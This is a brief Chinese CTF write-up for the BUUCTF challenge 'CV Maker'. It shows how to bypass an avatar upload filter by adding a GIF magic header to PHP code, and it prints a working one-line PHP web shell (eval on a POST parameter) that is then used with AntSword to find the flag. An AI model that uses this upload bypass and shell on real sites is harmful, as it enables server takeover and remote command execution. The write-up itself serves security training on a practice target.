[BUUCTF题解][WUSTCTF2020]CV Maker

### 知识点

文件上传

过程

做题先搜集（扫目录+检查HTTP报文+查看初始页面HTML代码），初始仅页面登录和初测功能可用，成功登录注册后会跳转到profile.php页面（直接访问也行）。

同样直接上传头像以外功能均不可用，尝试直接上传一句话失败。

<?=phpinfo()?>

加个图片的文件头幻数再试试，结果成功了，后缀还保留了.php。

GIF98a
<?=phpinfo()?>

并且会正常作为php文件解析。

那后面的事情就简单了，给一句话加上图片的文件头幻数然后连蚁剑就行。

GIF98a
<?=eval($_POST[cmd])?>

flag在根目录下一个以Flag开头的奇怪文件中。